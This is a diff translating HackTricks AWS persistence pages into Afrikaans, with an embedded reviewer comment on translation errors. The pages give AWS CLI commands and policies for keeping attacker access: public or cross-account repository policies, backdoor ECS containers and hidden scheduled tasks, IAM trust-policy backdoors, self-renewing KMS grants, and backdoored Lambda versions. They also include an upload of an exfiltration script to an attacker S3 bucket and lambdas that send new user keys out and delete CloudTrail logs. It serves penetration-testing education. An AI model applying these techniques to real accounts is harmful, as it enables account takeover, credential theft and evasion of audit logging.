@@ -1,101 +1,91 @@ -# AWS - ECR Persistence +# AWS - ECR Persistensie {{#include ../../../banners/hacktricks-training.md}} ## ECR -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Hidden Docker Image with Malicious Code +### Versteekte Docker Beeld met Kwaadwillige Kode -An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. +'n Aanvaller kan **'n Docker beeld wat kwaadwillige kode bevat** na 'n ECR-bewaarplek op te laai en dit gebruik om volharding in die teiken AWS-rekening te handhaaf. Die aanvaller kan dan die kwaadwillige beeld na verskeie dienste binne die rekening ontplooi, soos Amazon ECS of EKS, op 'n stil manier. -### Repository Policy - -Add a policy to a single repository granting yourself (or everybody) access to a repository: +### Bewaarplek Beleid +Voeg 'n beleid by 'n enkele bewaarplek wat jouself (of almal) toegang tot 'n bewaarplek gee: ```bash aws ecr set-repository-policy \ - --repository-name cluster-autoscaler \ - --policy-text file:///tmp/my-policy.json +--repository-name cluster-autoscaler \ +--policy-text file:///tmp/my-policy.json # With a .json such as { - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] +"Version" : "2008-10-17", +"Statement" : [ +{ +"Sid" : "allow public pull", +"Effect" : "Allow", +"Principal" : "*", +"Action" : [ +"ecr:BatchCheckLayerAvailability", +"ecr:BatchGetImage", +"ecr:GetDownloadUrlForLayer" +] +} +] } ``` - > [!WARNING] -> Note that ECR requires that users have **permission** to make calls to the 
**`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. +> Let daarop dat ECR vereis dat gebruikers **toestemming** het om oproepe na die **`ecr:GetAuthorizationToken`** API te maak deur 'n IAM-beleid **voordat hulle kan autentiseer** by 'n registrasie en enige beelde van enige Amazon ECR-bewaarplek kan stoot of trek. -### Registry Policy & Cross-account Replication +### Registrasiebeleid & Kruisrekening Replikaasje -It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. +Dit is moontlik om 'n registrasie in 'n eksterne rekening outomaties te repliseer deur kruisrekening replikaasie te konfigureer, waar jy die **eksterne rekening** moet **aandui** waar jy die registrasie wil repliseer.
-First, you need to give the external account access over the registry with a **registry policy** like: - +Eerstens, moet jy die eksterne rekening toegang gee oor die registrasie met 'n **registrasiebeleid** soos: ```bash aws ecr put-registry-policy --policy-text file://my-policy.json # With a .json like: { - "Sid": "asdasd", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::947247140022:root" - }, - "Action": [ - "ecr:CreateRepository", - "ecr:ReplicateImage" - ], - "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" +"Sid": "asdasd", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::947247140022:root" +}, +"Action": [ +"ecr:CreateRepository", +"ecr:ReplicateImage" +], +"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" } ``` - -Then apply the replication config: - +Dan pas die replikasie-konfigurasie toe: ```bash aws ecr put-replication-configuration \ - --replication-configuration file://replication-settings.json \ - --region us-west-2 +--replication-configuration file://replication-settings.json \ +--region us-west-2 # Having the .json a content such as: { - "rules": [{ - "destinations": [{ - "region": "destination_region", - "registryId": "destination_accountId" - }], - "repositoryFilters": [{ - "filter": "repository_prefix_name", - "filterType": "PREFIX_MATCH" - }] - }] +"rules": [{ +"destinations": [{ +"region": "destination_region", +"registryId": "destination_accountId" +}], +"repositoryFilters": [{ +"filter": "repository_prefix_name", +"filterType": "PREFIX_MATCH" +}] +}] } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md index 988626c8f..56f5f4c4e 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md 
@@ -1,32 +1,31 @@ -# AWS - ECS Persistence +# AWS - ECS Persistensie {{#include ../../../banners/hacktricks-training.md}} ## ECS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Hidden Periodic ECS Task +### Verborgen Periodieke ECS Taak > [!NOTE] -> TODO: Test - -An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. +> TODO: Toets +'n Aanvaller kan 'n verborgen periodieke ECS-taak skep met behulp van Amazon EventBridge om **die uitvoering van 'n kwaadwillige taak periodiek te skeduleer**. Hierdie taak kan verkenning uitvoer, data uitbring of volharding in die AWS-rekening handhaaf. ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ - { - "name": "malicious-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - } +{ +"name": "malicious-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +} ]' # Create an Amazon EventBridge rule to trigger the task periodically 
@@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate # Add a target to the rule to run the malicious ECS task aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ - { - "Id": "malicious-ecs-task-target", - "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", - "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", - "EcsParameters": { - "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", - "TaskCount": 1 - } - } +{ +"Id": "malicious-ecs-task-target", +"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", +"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", +"EcsParameters": { +"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", +"TaskCount": 1 +} +} ]' ``` - ### Backdoor Container in Existing ECS Task Definition > [!NOTE] -> TODO: Test - -An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities. +> TODO: Toets +'n Aanvaller kan 'n **stealthy backdoor container** by 'n bestaande ECS-taakdefinisie voeg wat saam met wettige houers loop. Die backdoor container kan gebruik word vir volharding en om kwaadwillige aktiwiteite uit te voer. 
```bash # Update the existing task definition to include the backdoor container aws ecs register-task-definition --family "existing-task" --container-definitions '[ - { - "name": "legitimate-container", - "image": "legitimate-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - }, - { - "name": "backdoor-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": false - } +{ +"name": "legitimate-container", +"image": "legitimate-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +}, +{ +"name": "backdoor-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": false +} ]' ``` - -### Undocumented ECS Service +### Ondokumenteerde ECS-diens > [!NOTE] -> TODO: Test - -An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service. +> TODO: Toets +'n Aanvaller kan 'n **ondokumenteerde ECS-diens** skep wat 'n kwaadwillige taak uitvoer. Deur die verlangde aantal take op 'n minimum in te stel en logging te deaktiveer, word dit moeiliker vir administrateurs om die kwaadwillige diens op te merk. ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ - { - "name": "malicious-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - } +{ +"name": "malicious-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +} ]' # Create an undocumented ECS service with the malicious task definition aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md index bdb282d41..b556d1ce8 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md @@ -1,25 +1,21 @@ -# AWS - EFS Persistence +# AWS - EFS Persistensie {{#include ../../../banners/hacktricks-training.md}} ## EFS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-efs-enum.md {{#endref}} -### Modify Resource Policy / Security Groups +### Wysig Hulpbronbeleid / Sekuriteitsgroepe -Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. +Deur die **hulpbronbeleid en/of sekuriteitsgroepe** te wysig, kan jy probeer om jou toegang tot die lĂȘerstelsel te behou. -### Create Access Point +### Skep Toegangspunt -You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. +Jy kan **'n toegangspunt skep** (met worteltoegang tot `/`) wat toeganklik is vanaf 'n diens waar jy **ander volharding** geĂŻmplementeer het om bevoorregte toegang tot die lĂȘerstelsel te hou. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md index c55e0e2ba..62eb63e80 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md 
@@ -1,34 +1,33 @@ -# AWS - Elastic Beanstalk Persistence +# AWS - Elastic Beanstalk Persistensie {{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-elastic-beanstalk-enum.md {{#endref}} -### Persistence in Instance +### Persistensie in Instansie -In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**. +Om persistensie binne die AWS-rekening te handhaaf, kan 'n **persistensie-meganisme binne die instansie ingevoer word** (cron job, ssh sleutel...) sodat die aanvaller toegang kan verkry en IAM rol **akkrediteer van die metadata diens** kan steel. -### Backdoor in Version +### Agterdeur in Weergawe -An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code. +'n Aanvaller kan die kode binne die S3 repo agterdeur sodat dit altyd sy agterdeur en die verwagte kode uitvoer. -### New backdoored version +### Nuwe agterdeur weergawe -Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application. +In plaas daarvan om die kode op die werklike weergawe te verander, kan die aanvaller 'n nuwe agterdeur weergawe van die toepassing ontplooi. -### Abusing Custom Resource Lifecycle Hooks +### Misbruik van Aangepaste Hulpbronne Lewe Siklus Hake > [!NOTE] -> TODO: Test - -Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**. 
+> TODO: Toets +Elastic Beanstalk bied lewe siklus hake wat jou toelaat om aangepaste skripte tydens instansie voorsiening en beĂ«indiging uit te voer. 'n Aanvaller kan **'n lewe siklus hake konfigureer om periodiek 'n skrip uit te voer wat data eksfiltreer of toegang tot die AWS-rekening handhaaf**. ```bash bashCopy code# Attacker creates a script that exfiltrates data and maintains access echo '#!/bin/bash 
@@ -42,40 +41,35 @@ aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hoo # Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook echo 'Resources: - AWSEBAutoScalingGroup: - Metadata: - AWS::ElasticBeanstalk::Ext: - TriggerConfiguration: - triggers: - - name: stealthy-lifecycle-hook - events: - - "autoscaling:EC2_INSTANCE_LAUNCH" - - "autoscaling:EC2_INSTANCE_TERMINATE" - target: - ref: "AWS::ElasticBeanstalk::Environment" - arn: - Fn::GetAtt: - - "AWS::ElasticBeanstalk::Environment" - - "Arn" - stealthyLifecycleHook: - Type: AWS::AutoScaling::LifecycleHook - Properties: - AutoScalingGroupName: - Ref: AWSEBAutoScalingGroup - LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING - NotificationTargetARN: - Ref: stealthy-lifecycle-hook - RoleARN: - Fn::GetAtt: - - AWSEBAutoScalingGroup - - Arn' > stealthy_lifecycle_hook.yaml +AWSEBAutoScalingGroup: +Metadata: +AWS::ElasticBeanstalk::Ext: +TriggerConfiguration: +triggers: +- name: stealthy-lifecycle-hook +events: +- "autoscaling:EC2_INSTANCE_LAUNCH" +- "autoscaling:EC2_INSTANCE_TERMINATE" +target: +ref: "AWS::ElasticBeanstalk::Environment" +arn: +Fn::GetAtt: +- "AWS::ElasticBeanstalk::Environment" +- "Arn" +stealthyLifecycleHook: +Type: AWS::AutoScaling::LifecycleHook +Properties: +AutoScalingGroupName: +Ref: AWSEBAutoScalingGroup +LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING +NotificationTargetARN: +Ref: stealthy-lifecycle-hook +RoleARN: +Fn::GetAtt: +- AWSEBAutoScalingGroup +- Arn' > stealthy_lifecycle_hook.yaml # Attacker applies the new environment configuration aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml" ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md index e3e1944e7..bceb96abf 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md 
@@ -1,53 +1,47 @@ -# AWS - IAM Persistence +# AWS - IAM Persistensie {{#include ../../../banners/hacktricks-training.md}} ## IAM -For more information access: +Vir meer inligting, toegang tot: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} -### Common IAM Persistence +### Algemene IAM Persistensie -- Create a user -- Add a controlled user to a privileged group -- Create access keys (of the new user or of all users) -- Grant extra permissions to controlled users/groups (attached policies or inline policies) -- Disable MFA / Add you own MFA device -- Create a Role Chain Juggling situation (more on this below in STS persistence) +- Skep 'n gebruiker +- Voeg 'n beheerde gebruiker by 'n bevoorregte groep +- Skep toegang sleutels (van die nuwe gebruiker of van alle gebruikers) +- Gee ekstra toestemmings aan beheerde gebruikers/groepe (aangehegte beleide of inline beleide) +- Deaktiveer MFA / Voeg jou eie MFA-toestel by +- Skep 'n Rol Ketting Juggling situasie (meer hieroor hieronder in STS persistensie) -### Backdoor Role Trust Policies - -You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): +### Backdoor Rol Vertroue Beleide +Jy kan 'n backdoor in 'n vertrouensbeleid plaas om dit te kan aanvaar vir 'n eksterne hulpbron wat deur jou beheer word (of vir almal): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": ["*", "arn:aws:iam::123213123123:root"] - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": ["*", "arn:aws:iam::123213123123:root"] +}, +"Action": "sts:AssumeRole" +} +] } ``` +### Backdoor-beleid Weergawe -### Backdoor Policy Version +Gee Administrateur regte aan 'n beleid in nie sy laaste weergawe nie (die laaste weergawe moet legitiem lyk), en ken dan daardie weergawe van die beleid toe aan 'n beheerde gebruiker/groep. 
-Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. +### Backdoor / Skep Identiteitsverskaffer -### Backdoor / Create Identity Provider - -If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. +As die rekening reeds 'n algemene identiteitsverskaffer (soos Github) vertrou, kan die voorwaardes van die vertroue verhoog word sodat die aanvaller dit kan misbruik. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md index 7aefbd410..310772cc2 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md 
@@ -1,43 +1,37 @@ -# AWS - KMS Persistence +# AWS - KMS Volharding {{#include ../../../banners/hacktricks-training.md}} ## KMS -For mor information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-kms-enum.md {{#endref}} -### Grant acces via KMS policies +### Gee toegang via KMS-beleide -An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. +'n Aanvaller kan die toestemming **`kms:PutKeyPolicy`** gebruik om **toegang te gee** tot 'n sleutel aan 'n gebruiker onder sy beheer of selfs aan 'n eksterne rekening. Kyk na die [**KMS Privesc-bladsy**](../aws-privilege-escalation/aws-kms-privesc.md) vir meer inligting. -### Eternal Grant +### Ewige Toestemming -Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. +Toestemmings is 'n ander manier om 'n prinsiep sekere toestemmings oor 'n spesifieke sleutel te gee. Dit is moontlik om 'n toestemming te gee wat 'n gebruiker toelaat om toestemmings te skep. Boonop kan 'n gebruiker verskeie toestemmings (selfs identies) oor dieselfde sleutel hĂȘ. -Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. - -(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) +Daarom is dit moontlik vir 'n gebruiker om 10 toestemmings met al die toestemmings te hĂȘ. Die aanvaller moet dit konstant monitor. En as op 'n sekere punt 1 toestemming verwyder word, moet nog 10 gegenereer word. 
+(Ons gebruik 10 en nie 2 nie om te kan opspoor dat 'n toestemming verwyder is terwyl die gebruiker steeds 'n paar toestemmings het) ```bash # To generate grants, generate 10 like this one aws kms create-grant \ - --key-id \ - --grantee-principal \ - --operations "CreateGrant" "Decrypt" +--key-id \ +--grantee-principal \ +--operations "CreateGrant" "Decrypt" # To monitor grants aws kms list-grants --key-id ``` - > [!NOTE] -> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) +> 'n Toekenning kan slegs toestemmings gee vanaf hierdie: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md index 1390c2d55..06eb48a41 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md 
@@ -1,68 +1,64 @@ -# AWS - Lambda Persistence +# AWS - Lambda Persistensie {{#include ../../../../banners/hacktricks-training.md}} ## Lambda -For more information check: +Vir meer inligting, kyk: {{#ref}} ../../aws-services/aws-lambda-enum.md {{#endref}} -### Lambda Layer Persistence +### Lambda Laag Persistensie -It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: +Dit is moontlik om **'n laag in te voer/terugdeur te maak om arbitrĂȘre kode uit te voer** wanneer die lambda op 'n stil manier uitgevoer word: {{#ref}} aws-lambda-layers-persistence.md {{#endref}} -### Lambda Extension Persistence +### Lambda Uitbreiding Persistensie -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. +Deur Lambda Lae te misbruik, is dit ook moontlik om uitbreidings te misbruik en in die lambda te bly, maar ook versoeke te steel en te wysig. {{#ref}} aws-abusing-lambda-extensions.md {{#endref}} -### Via resource policies +### Deur hulpbronbeleide -It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: +Dit is moontlik om toegang tot verskillende lambda aksies (soos aanroep of kode opdateer) aan eksterne rekeninge te verleen:
-### Versions, Aliases & Weights +### Weergawes, Aliasse & Gewigte -A Lambda can have **different versions** (with different code each version).\ -Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ -This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. +'n Lambda kan **verskillende weergawes** hĂȘ (met verskillende kode in elke weergawe).\ +Dan kan jy **verskillende aliasse met verskillende weergawes** van die lambda skep en verskillende gewigte aan elkeen toeken.\ +Op hierdie manier kan 'n aanvaller 'n **terugdeur weergawe 1** en 'n **weergave 2 met slegs die wettige kode** skep en **slegs die weergawe 1 in 1%** van die versoeke uitvoer om stil te bly.
-### Version Backdoor + API Gateway +### Weergave Terugdeur + API Gateway -1. Copy the original code of the Lambda -2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST - 1. Call the API gateway related to the lambda to execute the code -3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. - 1. This will hide the backdoored code in a previous version -4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` - 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). -5. Select the POST method created and in Actions select **`Deploy API`** -6. Now, when you **call the function via POST your Backdoor** will be invoked +1. Kopieer die oorspronklike kode van die Lambda +2. **Skep 'n nuwe weergawe wat die** oorspronklike kode terugdeur maak (of net met kwaadwillige kode). Publiseer en **ontplooi daardie weergawe** na $LATEST +1. Roep die API-gateway wat met die lambda verband hou aan om die kode uit te voer +3. **Skep 'n nuwe weergawe met die oorspronklike kode**, Publiseer en ontplooi daardie **weergave** na $LATEST. +1. Dit sal die terugdeurkode in 'n vorige weergawe verberg +4. Gaan na die API Gateway en **skep 'n nuwe POST-metode** (of kies enige ander metode) wat die terugdeur weergawe van die lambda sal uitvoer: `arn:aws:lambda:us-east-1::function::1` +1. Let op die finale :1 van die arn **wat die weergawe van die funksie aandui** (weergave 1 sal die terugdeur een in hierdie scenario wees). +5. Kies die POST-metode wat geskep is en in Aksies kies **`Ontplooi API`** +6. 
Nou, wanneer jy **die funksie via POST aanroep, sal jou Terugdeur** geaktiveer word -### Cron/Event actuator +### Cron/Event aktuator -The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ -Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. +Die feit dat jy **lambda funksies kan laat loop wanneer iets gebeur of wanneer 'n tyd verbygaan** maak lambda 'n goeie en algemene manier om volharding te verkry en opsporing te vermy.\ +Hier is 'n paar idees om jou **teenwoordigheid in AWS meer stil te maak deur lambdas** te skep. -- Every time a new user is created lambda generates a new user key and send it to the attacker. -- Every time a new role is created lambda gives assume role permissions to compromised users. -- Every time new cloudtrail logs are generated, delete/alter them +- Elke keer wanneer 'n nuwe gebruiker geskep word, genereer lambda 'n nuwe gebruikerssleutel en stuur dit na die aanvaller. +- Elke keer wanneer 'n nuwe rol geskep word, gee lambda aanneemrol toestemmings aan gecompromitteerde gebruikers. +- Elke keer wanneer nuwe cloudtrail logs gegenereer word, verwyder/wysig hulle {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md index 71655ada0..26feb4028 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md 
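Review bot: in the aws-lambda-persistence.md hunk the numbered sub-steps lost their indentation, so `+1. Roep die API-gateway wat met die lambda verband hou aan om die kode uit te voer` and `+1. Dit sal die terugdeurkode in 'n vorige weergawe verberg` are now top-level items and the procedure renders as one flat nine-item list instead of six steps with nested notes; restore the leading spaces the removed `-` lines had. The translation also spells one word two ways: "weergawe" in the heading and in step 2, but "weergave" in "'n **weergave 2 met slegs die wettige kode**", "### Weergave Terugdeur + API Gateway", "ontplooi daardie **weergave**" and "(weergave 1 sal die terugdeur een ... wees)"; "weergawe" is correct. "gecompromitteerde gebruikers" should be "gekompromitteerde gebruikers". Two points inherited from the English are worth fixing while this text is being touched: `arn:aws:lambda:us-east-1::function::1` has empty account-id and function-name fields, so a short remark that those must be filled in (only the trailing `:1` is the version qualifier) would help the reader, and "Publiseer en ontplooi daardie weergawe na $LATEST" conflates publishing a numbered version with $LATEST, which is the unpublished code; "publiseer 'n weergawe vanaf die huidige $LATEST kode" states what is actually meant.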
@@ -1,46 +1,42 @@ -# AWS - Abusing Lambda Extensions +# AWS - Misbruik van Lambda-uitbreidings {{#include ../../../../banners/hacktricks-training.md}} -## Lambda Extensions +## Lambda-uitbreidings -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. +Lambda-uitbreidings verbeter funksies deur te integreer met verskeie **monitering, waaksaamheid, sekuriteit en bestuur gereedskap**. Hierdie uitbreidings, wat bygevoeg word via [.zip argiewe met Lambda-lae](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) of ingesluit in [houerbeeld ontplooiings](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), werk in twee modi: **intern** en **ekstern**. -- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **Interne uitbreidings** meng met die runtime-proses, wat die opstart daarvan manipuleer met behulp van **taalspesifieke omgewing veranderlikes** en **wrapper-skripte**. 
Hierdie aanpassing geld vir 'n reeks runtimes, insluitend **Java Correto 8 en 11, Node.js 10 en 12, en .NET Core 3.1**. +- **Eksterne uitbreidings** loop as aparte prosesse, wat die werking in lyn hou met die Lambda-funksie se lewensiklus. Hulle is versoenbaar met verskeie runtimes soos **Node.js 10 en 12, Python 3.7 en 3.8, Ruby 2.5 en 2.7, Java Corretto 8 en 11, .NET Core 3.1**, en **aangepaste runtimes**. -For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). +Vir meer inligting oor [**hoe lambda-uitbreidings werk, kyk die dokumentasie**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). -### External Extension for Persistence, Stealing Requests & modifying Requests +### Eksterne Uitbreiding vir Volharding, Diefstal van Versoeke & Modifisering van Versoeke -This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) +Dit is 'n opsomming van die tegniek wat in hierdie pos voorgestel word: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) -It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.** +Daar is gevind dat die standaard Linux-kern in die Lambda-runtime-omgewing saamgecompileer is met “**process_vm_readv**” en “**process_vm_writev**” stelsels oproepe. En alle prosesse loop met dieselfde gebruikers-ID, selfs die nuwe proses wat geskep is vir die eksterne uitbreiding. 
**Dit beteken dat 'n eksterne uitbreiding volle lees- en skryfgemagtiging het tot Rapid se heap-geheue, volgens ontwerp.** -Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. +Boonop, terwyl Lambda-uitbreidings die vermoĂ« het om **in te teken op aanroepgebeurtenisse**, openbaar AWS nie die rou data aan hierdie uitbreidings nie. Dit verseker dat **uitbreidings nie toegang het tot sensitiewe inligting** wat via die HTTP-versoek oorgedra word. -The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. +Die Init (Rapid) proses monitor alle API-versoeke by [http://127.0.0.1:9001](http://127.0.0.1:9001/) terwyl Lambda-uitbreidings geĂŻnitialiseer en uitgevoer word voordat enige runtime-kode uitgevoer word, maar na Rapid.

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

